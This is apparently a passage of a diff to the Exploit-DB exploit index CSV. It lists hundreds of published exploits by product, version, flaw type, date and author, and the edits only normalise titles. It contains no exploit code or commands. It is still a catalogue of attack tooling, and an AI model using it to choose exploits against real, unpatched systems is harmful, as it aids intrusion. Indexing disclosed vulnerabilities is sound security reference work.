2.5.1",1997-11-24,anonymous,linux,remote,0 19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 Count.cgi Buffer Overflow Vulnerability",1997-10-16,"Razvan Dragomirescu",linux,remote,0 19106,platforms/linux/local/19106.c,"BSDI BSD/OS <= 2.1,FreeBSD <= 2.1,IBM AIX <= 4.2,SGI IRIX <= 6.4,Sun SunOS <= 4.1.3",1996-07-03,"Jeff Uphoff",linux,local,0 @@ -16478,11 +16478,11 @@ id,file,description,date,author,platform,type,port 19108,platforms/unix/local/19108,"HP HP-UX 10.20/11.0,IBM AIX <= 4.3,SCO Unixware 7.0,Sun Solaris <= 2.6",1999-11-03,Mastoras,unix,local,0 19109,platforms/linux/remote/19109.c,"Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerability (1)",1998-06-27,"Seth McGann",linux,remote,0 19110,platforms/unix/remote/19110.c,"Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerability (2)",1998-06-27,"Miroslaw Grzybek",unix,remote,0 -19111,platforms/linux/remote/19111.c,"BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND buffer overflow(1)",1998-04-08,ROTShB,linux,remote,0 -19112,platforms/linux/remote/19112.c,"BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND buffer overflow(2)",1998-04-08,prym,linux,remote,0 +19111,platforms/linux/remote/19111.c,"BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND Buffer overflow(1)",1998-04-08,ROTShB,linux,remote,0 +19112,platforms/linux/remote/19112.c,"BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND Buffer overflow(2)",1998-04-08,prym,linux,remote,0 19113,platforms/windows/remote/19113,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd Vulnerability",1999-01-02,"Tomas Halgas",windows,remote,23 19117,platforms/linux/remote/19117.c,"Digital UNIX <= 4.0 D,FreeBSD <= 2.2.4,HP HP-UX 10.20/11.0,IBM AIX <= 3.2.5,Linux kernel 2.0/2.1,NetBSD 1.2,Solaris <= 2.5.1 Smurf Denial of Service Vulnerability",1998-01-05,"T. Freak",linux,remote,0 -19118,platforms/multiple/remote/19118,"Microsoft IIS 3.0/4.0,Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability",1998-01-01,"Paul Ashton",multiple,remote,0 +19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0,Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability",1998-01-01,"Paul Ashton",multiple,remote,0 19119,platforms/linux/remote/19119.c,"HP HP-UX <= 10.34 rlpdaemon Vulnerability",1998-07-06,"RSI Advise",linux,remote,0 19120,platforms/multiple/remote/19120,"Ralf S. Engelschall ePerl 2.2.12 Handling of ISINDEX Query Vulnerability",1998-07-06,"Luz Pinto",multiple,remote,0 19121,platforms/multiple/remote/19121,"Ray Chan WWW Authorization Gateway 0.1 Vulnerability",1998-07-08,"Albert Nubdy",multiple,remote,0 @@ -16509,7 +16509,7 @@ id,file,description,date,author,platform,type,port 19144,platforms/windows/local/19144,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability",1999-01-07,"Satu Laksela",windows,local,0 19145,platforms/windows/local/19145.c,"NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 Server Operator to Administrator Privilege Escalation: System Key Vulnerability",1999-01-11,Mnemonix,windows,local,0 19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 Vulnerability",1999-01-03,"Dr. Mudge",linux,local,0 -19147,platforms/windows/remote/19147,"NT IIS4 Remote Web-Based Administration Vulnerability",1999-01-14,Mnemonix,windows,remote,0 +19147,platforms/windows/remote/19147,"NT IIS4 - Remote Web-Based Administration Vulnerability",1999-01-14,Mnemonix,windows,remote,0 19149,platforms/windows/remote/19149.c,"NT IIS4 Log Avoidance Vulnerability",1999-01-22,Mnemonix,windows,remote,0 19152,platforms/windows/remote/19152,"Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory Vulnerability",1999-01-26,Mnemonix,windows,remote,0 19154,platforms/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 @@ -16588,7 +16588,7 @@ id,file,description,date,author,platform,type,port 19238,platforms/windows/remote/19238,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability",1999-06-04,"Carl Byington",windows,remote,0 19239,platforms/windows/remote/19239,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability",1999-06-04,"Scott Danahy",windows,remote,0 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation Vulnerability",1999-06-09,"Brian Mitchell",linux,local,0 -19241,platforms/linux/remote/19241.c,"Linux Kernel 2.2/2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options Vulnerability",1999-06-01,"Piotr Wilkin",linux,remote,0 +19241,platforms/linux/remote/19241.c,"Linux Kernel 2.2/2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options Vulnerability",1999-06-01,"Piotr Wilkin",linux,remote,0 19242,platforms/multiple/remote/19242,"CdomainFree <= 2.4 - Remote File Execution Vulnerability",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote,0 19243,platforms/linux/local/19243,"G. Wilford man 2.3.10 Symlink Vulnerability",1999-06-02,"Thomas Fischbacher",linux,local,0 19244,platforms/osx/local/19244.sh,"Apple Mac OS X Server 10.0 Overload Vulnerability",1999-06-03,"Juergen Schmidt",osx,local,0 @@ -16640,7 +16640,7 @@ id,file,description,date,author,platform,type,port 19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer <= 6.4.017 Stack Buffer Overflow Vulnerability",2012-06-19,metasploit,windows,remote,0 19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilites",2012-06-19,Vulnerability-Lab,php,webapps,0 19293,platforms/windows/local/19293.py,"Sysax <= 5.62 Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0 -19294,platforms/php/webapps/19294.txt,"WordPress Schreikasten 0.14.13 XSS",2012-06-20,"Henry Hoggard",php,webapps,0 +19294,platforms/php/webapps/19294.txt,"WordPress Schreikasten 0.14.13 - XSS",2012-06-20,"Henry Hoggard",php,webapps,0 19295,platforms/windows/remote/19295.rb,"Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",2012-06-20,metasploit,windows,remote,0 19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 sdrd Vulnerability",1998-08-05,"Chuck Athey and Jim Garlick",linux,remote,0 19298,platforms/multiple/remote/19298,"SGI IRIX 6.2 cgi-bin wrap Vulnerability",1997-04-19,"J.A. Gutierrez",multiple,remote,0 @@ -16663,7 +16663,7 @@ id,file,description,date,author,platform,type,port 19315,platforms/linux/local/19315.c,"RedHat Linux 5.0/5.1/5.2,Slackware Linux <= 3.5 klogd Buffer Overflow Vulnerability (2)",1999-02-26,"Esa Etelavuori",linux,local,0 19316,platforms/irix/remote/19316.c,"SGI IRIX <= 6.5.2 nsd Vulnerability",1999-05-31,"Jefferson Ogata",irix,remote,0 19317,platforms/irix/local/19317.c,"SGI IRIX 5.3/6.2 ordist Vulnerability",1997-05-24,"Yuri Volobuev",irix,local,0 -19318,platforms/aix/local/19318.c,"SGI IRIX <= 6.4 permissions Buffer overflow Vulnerability",1997-05-26,"David Hedley",aix,local,0 +19318,platforms/aix/local/19318.c,"SGI IRIX <= 6.4 permissions Buffer Overflow Vulnerability",1997-05-26,"David Hedley",aix,local,0 19319,platforms/irix/local/19319.c,"SGI IRIX 5.3 pkgadjust Vulnerability",1996-09-23,"Hui-Hui Hu",irix,local,0 19321,platforms/windows/webapps/19321.txt,"IBM System Storage DS Storage Manager Profiler Multiple Vulnerabilities",2012-06-21,LiquidWorm,windows,webapps,0 19322,platforms/windows/remote/19322.rb,"Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow",2012-06-21,Rh0,windows,remote,0 @@ -16729,7 +16729,7 @@ id,file,description,date,author,platform,type,port 19386,platforms/php/webapps/19386.txt,"UCCASS <= 1.8.1 - Blind SQL Injection Vulnerability",2012-06-24,dun,php,webapps,0 19387,platforms/windows/remote/19387.rb,"Apple iTunes 10 Extended M3U Stack Buffer Overflow",2012-06-25,metasploit,windows,remote,0 19388,platforms/windows/dos/19388.py,"Kingview Touchview 6.53 EIP Overwrite",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,555 -19389,platforms/windows/dos/19389.txt,"Kingview Touchview 6.53 Multiple Heap Overflow Vulnerabilities",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 +19389,platforms/windows/dos/19389.txt,"Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19393,platforms/windows/dos/19393.py,"Able2Doc and Able2Doc Professional 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 @@ -16789,7 +16789,7 @@ id,file,description,date,author,platform,type,port 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 Local DoS",2012-06-29,0in,windows,dos,0 19455,platforms/windows/webapps/19455.txt,"specview <= 2.5 build 853 - Directory Traversal",2012-06-29,"Luigi Auriemma",windows,webapps,0 19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client <= 8.9 (RFSync 1.0.0.1) Crash PoC",2012-06-29,"Luigi Auriemma",windows,dos,0 -19457,platforms/multiple/dos/19457,"Ms Commercial Internet System 2.0/2.5,IIS 4.0,Site Server Commerce Edition 3.0 alpha/3.0 DoS",1999-08-11,"Nobuo Miwa",multiple,dos,0 +19457,platforms/multiple/dos/19457,"Microsoft Commercial Internet System 2.0/2.5,IIS 4.0,Site Server Commerce Edition 3.0 alpha/3.0 DoS",1999-08-11,"Nobuo Miwa",multiple,dos,0 19458,platforms/linux/remote/19458.c,"Linux kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing Vulnerability",1999-07-31,Nergal,linux,remote,0 19459,platforms/multiple/remote/19459,"Hybrid Ircd 5.0.3 p7 Buffer Overflow Vulnerability",1999-08-13,"jduck and stranjer",multiple,remote,0 19460,platforms/multiple/local/19460.sh,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (1)",1999-08-16,"Brock Tellier",multiple,local,0 @@ -16800,15 +16800,15 @@ id,file,description,date,author,platform,type,port 19465,platforms/linux/local/19465.c,"RedHat Linux <= 6.0, Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 19466,platforms/multiple/remote/19466,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 Vulnerability",1999-08-18,"Gregory Duchemin",multiple,remote,0 19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 pt_chown Vulnerability",1999-08-23,"Michal Zalewski",linux,local,0 -19468,platforms/windows/remote/19468,"MS IE 5.0 ActiveX ""Object for constructing type libraries for scriptlets"" Vulnerability",1999-08-21,"Georgi Guninski",windows,remote,0 +19468,platforms/windows/remote/19468,"Microsoft Internet Explorer 5.0 ActiveX ""Object for constructing type libraries for scriptlets"" Vulnerability",1999-08-21,"Georgi Guninski",windows,remote,0 19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (1)",1999-08-30,Akke,linux,local,0 19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (2)",1999-08-25,jbowie,linux,local,0 19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5.0 HTML Form Control DoS",1999-08-27,"Neon Bunny",windows,dos,0 19472,platforms/windows/local/19472,"IBM GINA for NT 1.0 Privilege Escalation Vulnerability",1999-08-23,"Frank Pikelner",windows,local,0 19473,platforms/windows/local/19473,"Microsoft Internet Explorer 5.0 FTP Password Storage Vulnerability",1999-08-25,"Makoto Shiotsuki",windows,local,0 19474,platforms/linux/local/19474,"Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat <= 6.0 - Vixie Cron MAILTO Sendmail Vulnerability",1999-08-25,"Olaf Kirch",linux,local,0 -19475,platforms/linux/remote/19475.c,"ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 -19476,platforms/linux/remote/19476.c,"ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0 +19475,platforms/linux/remote/19475.c,"ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 +19476,platforms/linux/remote/19476.c,"ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0 19477,platforms/hardware/dos/19477,"TFS Gateway 4.0 - Denial of Service Vulnerability",1999-08-31,anonymous,hardware,dos,0 19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1,FreeBSD 3.0/3.1/3.2,RedHat Linux <= 6.0 amd Buffer Overflow Vulnerability (1)",1999-08-31,Taeho,unix,remote,0 19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1,FreeBSD 3.0/3.1/3.2,RedHat Linux <= 6.0 amd Buffer Overflow Vulnerability (2)",1999-08-30,c0nd0r,unix,remote,0 @@ -16819,12 +16819,12 @@ id,file,description,date,author,platform,type,port 19484,platforms/windows/remote/19484.rb,"HP Data Protector Create New Folder Buffer Overflow",2012-07-01,metasploit,windows,remote,3817 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 Buffer Overflow Vulnerabilities",1999-08-31,"Przemyslaw Frasunek",linux,local,0 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 EMBED Buffer Overflow Vulnerability",1999-09-02,"R00t Zer0",windows,remote,0 -19487,platforms/windows/remote/19487,"MS IE 4.0/5.0 ActiveX ""Eyedog"" Vulnerability",1999-08-21,"Shane Hird's",windows,remote,0 -19488,platforms/bsd/local/19488.c,"FreeBSD <= 5.0,NetBSD <= 1.4.2,OpenBSD <= 2.7 setsockopt() Dos",1999-09-05,"L. Sassaman",bsd,local,0 +19487,platforms/windows/remote/19487,"Microsoft Internet Explorer 4.0/5.0 ActiveX ""Eyedog"" Vulnerability",1999-08-21,"Shane Hird's",windows,remote,0 +19488,platforms/bsd/local/19488.c,"FreeBSD <= 5.0,NetBSD <= 1.4.2,OpenBSD <= 2.7 setsockopt() DoS",1999-09-05,"L. Sassaman",bsd,local,0 19489,platforms/windows/dos/19489,"Microsoft Windows NT 4.0 DCOM Server Vulnerability",1999-09-08,Mnemonix,windows,dos,0 -19490,platforms/windows/remote/19490,"MS IE 4.0.1/5.0 Import/Export Favorites Vulnerability",1999-09-10,"Georgi Guninski",windows,remote,0 +19490,platforms/windows/remote/19490,"Microsoft Internet Explorer 4.0.1/5.0 Import/Export Favorites Vulnerability",1999-09-10,"Georgi Guninski",windows,remote,0 19491,platforms/windows/remote/19491,"BindView HackerShield 1.0/1.1 HackerShield AgentAdmin Password Vulnerability",1999-09-10,anonymous,windows,remote,0 -19492,platforms/multiple/remote/19492,"MS IE 5.0,Netscape Communicator 4.0/4.5/4.6 Javascript STYLE Vulnerability",1999-09-13,"Georgi Guninski",multiple,remote,0 +19492,platforms/multiple/remote/19492,"Microsoft Internet Explorer 5.0,Netscape Communicator 4.0/4.5/4.6 Javascript STYLE Vulnerability",1999-09-13,"Georgi Guninski",multiple,remote,0 19493,platforms/multiple/remote/19493,"Netscape Enterprise Server 3.51/3.6 SP2 Accept Buffer Overflow Vulnerability",1999-09-13,"Nobuo Miwa",multiple,remote,0 19494,platforms/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 SMTP Buffer Overflow Vulnerability",1999-09-13,UNYUN,windows,remote,0 @@ -16838,7 +16838,7 @@ id,file,description,date,author,platform,type,port 19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 GECOS Buffer Overflow Vulnerability",1999-09-21,"babcia padlina ltd",freebsd,local,0 19505,platforms/freebsd/local/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache Denial of Service Vulnerability",1999-09-22,"Charles M. Hannum",freebsd,local,0 -19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3,MS Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0 +19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3,ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0 19507,platforms/solaris/remote/19507.txt,"Solaris <= 7.0 Recursive mutex_enter Panic Vulnerability",1999-09-23,"David Brumley",solaris,remote,0 19508,platforms/linux/local/19508.sh,"S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow Vulnerability",1999-09-23,"Brock Tellier",linux,local,0 19509,platforms/solaris/local/19509.sh,"Solaris <= 2.6 Profiling File Creation Vulnerability",1999-09-22,"Steve Mynott",solaris,local,0 @@ -16847,37 +16847,37 @@ id,file,description,date,author,platform,type,port 19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0,Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0 19513,platforms/hardware/remote/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 DoS",1999-09-27,"Bjorn Stickler",hardware,remote,0 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 -19515,platforms/windows/remote/19515.txt,"MS IE 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 +19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0 19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 <= 4.3.2.0 - jp2 Stack Buffer Overflow",2012-07-01,metasploit,windows,local,0 19520,platforms/bsd/remote/19520.txt,"BSD telnetd Remote Root Exploit",2012-07-01,kingcope,bsd,remote,0 -19521,platforms/windows/remote/19521.txt,"MS IE 5.0/4.0.1 hhopen OLE Control Buffer Overflow Vulnerability",1999-09-27,"Shane Hird",windows,remote,0 +19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 hhopen OLE Control Buffer Overflow Vulnerability",1999-09-27,"Shane Hird",windows,remote,0 19522,platforms/linux/remote/19522.txt,"Linux kernel 2.2 Predictable TCP Initial Sequence Number Vulnerability",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 19523,platforms/linux/local/19523.txt,"python-wrapper Untrusted Search Path/Code Execution Vulnerability",2012-07-02,ShadowHatesYou,linux,local,0 19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0 19525,platforms/windows/webapps/19525.txt,"IIS Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps,0 19526,platforms/hardware/webapps/19526.rb,"WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal",2012-07-02,"Dillon Beresford",hardware,webapps,0 -19528,platforms/windows/local/19528.txt,"MS IE 4.1/5.0 Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 +19528,platforms/windows/local/19528.txt,"Microsoft Internet Explorer 4.1/5.0 Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19529,platforms/solaris/local/19529.c,"Solaris 7.0 /usr/bin/mail -m Local Buffer Overflow Vulnerability",1999-09-12,"Brock Tellier",solaris,local,0 -19530,platforms/windows/remote/19530.txt,"MS IE 5.0 Download Behavior Vulnerability",1999-09-27,"Georgi Guninski",windows,remote,0 +19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5.0 Download Behavior Vulnerability",1999-09-27,"Georgi Guninski",windows,remote,0 19531,platforms/hardware/remote/19531.txt,"Cisco IOS <= 12.0.2 Syslog Crash",1999-01-11,"Olaf Selke",hardware,remote,0 19532,platforms/aix/remote/19532.pl,"IBM AIX <= 4.3.2 ftpd Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0 19533,platforms/solaris/local/19533.c,"Solaris <= 7.0 ufsdump Local Buffer Overflow Vulnerability (1)",1998-04-23,smm,solaris,local,0 19534,platforms/solaris/local/19534.c,"Solaris <= 7.0 ufsdump Local Buffer Overflow Vulnerability (2)",1998-12-30,"Cheez Whiz",solaris,local,0 19535,platforms/hp-ux/local/19535.pl,"HP-UX <= 10.20 newgrp Vulnerability",1996-12-01,SOD,hp-ux,local,0 19536,platforms/multiple/dos/19536.txt,"Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability",1996-12-10,"Josh Richards",multiple,dos,0 -19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal vulnerability",1999-10-02,"rain forest puppy",windows,remote,0 +19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal Vulnerability",1999-10-02,"rain forest puppy",windows,remote,0 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration Vulnerability",1999-10-05,KSR[T],hardware,remote,0 -19539,platforms/windows/remote/19539.txt,"MS IE 5.0/4.0.1 IFRAME Vulnerability",1999-10-11,"Georgi Guninski",windows,remote,0 -19540,platforms/windows/remote/19540.txt,"t. hauck jana webserver 1.0/1.45/1.46 - Directory Traversal vulnerability",1999-10-08,"Jason Lutz",windows,remote,0 +19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 IFRAME Vulnerability",1999-10-11,"Georgi Guninski",windows,remote,0 +19540,platforms/windows/remote/19540.txt,"t. hauck jana webserver 1.0/1.45/1.46 - Directory Traversal Vulnerability",1999-10-08,"Jason Lutz",windows,remote,0 19541,platforms/novell/remote/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service Vulnerability",1999-10-08,"Bruce Dennison",novell,remote,0 19542,platforms/sco/local/19542.txt,"SCO Open Server <= 5.0.5 'userOsa' symlink Vulnerability",1999-10-11,"Brock Tellier",sco,local,0 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 cancel Buffer Overflow Vulnerability",1999-10-08,"Brock Tellier",sco,local,0 19544,platforms/linux/local/19544.c,"BSD/OS 2.1,FreeBSD <= 2.1.5,NeXTstep 4.x,IRIX <= 6.4,SunOS 4.1.3/4.1.4 lpr Buffer Overrun(1)",1996-10-25,"Vadim Kolontsov",linux,local,0 19545,platforms/bsd/local/19545.c,"BSD/OS 2.1,FreeBSD <= 2.1.5,NeXTstep 4.x,IRIX <= 6.4,SunOS 4.1.3/4.1.4 lpr Buffer Overrun(2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 -19546,platforms/multiple/local/19546.pl,"BSD/OS 2.1/3.0,Larry Wall Perl 5.0 03,RedHat 4.0/4.1,SGI Freeware 1.0/2.0 suidperl Overflow(1)",1997-04-17,"Pavel Kankovsky",multiple,local,0 -19547,platforms/multiple/local/19547.txt,"BSD/OS 2.1/3.0,Larry Wall Perl 5.0 03,RedHat 4.0/4.1,SGI Freeware 1.0/2.0 suidperl Overflow(2)",1997-04-17,"Willy Tarreau",multiple,local,0 +19546,platforms/multiple/local/19546.pl,"BSD/OS 2.1/3.0,Larry Wall Perl 5.0 03,RedHat 4.0/4.1,SGI Freeware 1.0/2.0 suidperl Overflow (1)",1997-04-17,"Pavel Kankovsky",multiple,local,0 +19547,platforms/multiple/local/19547.txt,"BSD/OS 2.1/3.0,Larry Wall Perl 5.0 03,RedHat 4.0/4.1,SGI Freeware 1.0/2.0 suidperl Overflow (2)",1997-04-17,"Willy Tarreau",multiple,local,0 19548,platforms/php/webapps/19548.txt,"gp easy CMS Minishop 1.5 Plugin Persistent XSS",2012-07-03,"Carlos Mario Penagos Hollmann",php,webapps,0 19549,platforms/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",php,webapps,0 19550,platforms/php/webapps/19550.txt,"phpMyBackupPro <= 2.2 - Local File Inclusion Vulnerability",2012-07-03,dun,php,webapps,0 @@ -16889,7 +16889,7 @@ id,file,description,date,author,platform,type,port 19556,platforms/multiple/local/19556.sh,"BSD 2,CND 1,Sendmail 8.x,FreeBSD 2.1.x,HP-UX 10.x,AIX 4,RedHat 4 Sendmail Daemon Vuln",1996-11-16,"Leshka Zakharoff",multiple,local,0 19557,platforms/linux/remote/19557.txt,"John S.2 Roberts AnyForm 1.0/2.0 CGI Semicolon Vulnerability",1995-07-31,"Paul Phillips",linux,remote,0 19558,platforms/linux/remote/19558.c,"OpenLink Software OpenLink 3.2 - Remote Buffer Overflow Vulnerability",1999-10-15,"Tymm Twillman",linux,remote,0 -19559,platforms/windows/remote/19559.txt,"MS IE 5.0/4.0.1 Javascript URL Redirection Vulnerability",1999-10-18,"Georgi Guninski",windows,remote,0 +19559,platforms/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 Javascript URL Redirection Vulnerability",1999-10-18,"Georgi Guninski",windows,remote,0 19560,platforms/multiple/remote/19560.c,"Washington University wu-ftpd 2.5 .0 message Buffer Overflow Vulnerability",1999-10-19,typo/teso,multiple,remote,0 19561,platforms/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x Mail Server Multiple Buffer Overflow",1999-10-01,"Arne Vidstrom",windows,remote,0 19562,platforms/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 ""Server ID"" Buffer Overflow Vulnerability",1999-09-30,"Per Bergehed",windows,dos,0 @@ -16898,7 +16898,7 @@ id,file,description,date,author,platform,type,port 19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 cwdtools Vulnerabilities",1999-10-22,"Brock Tellier",linux,local,0 19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPD 1.1/2.4 Pro Buffer Overflow Vulnerability",1999-10-22,UNYUN,windows,remote,0 19567,platforms/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 Authentication Failure",1999-10-25,"Oezguer Kesim",linux,remote,0 -19568,platforms/windows/remote/19568.txt,"pacific software url live! 1.0 - Directory Traversal vulnerability",1999-10-28,UNYUN,windows,remote,0 +19568,platforms/windows/remote/19568.txt,"pacific software url live! 1.0 - Directory Traversal Vulnerability",1999-10-28,UNYUN,windows,remote,0 19569,platforms/windows/dos/19569.pl,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow Vulnerability (1)",1999-10-28,"Alberto Soli",windows,dos,0 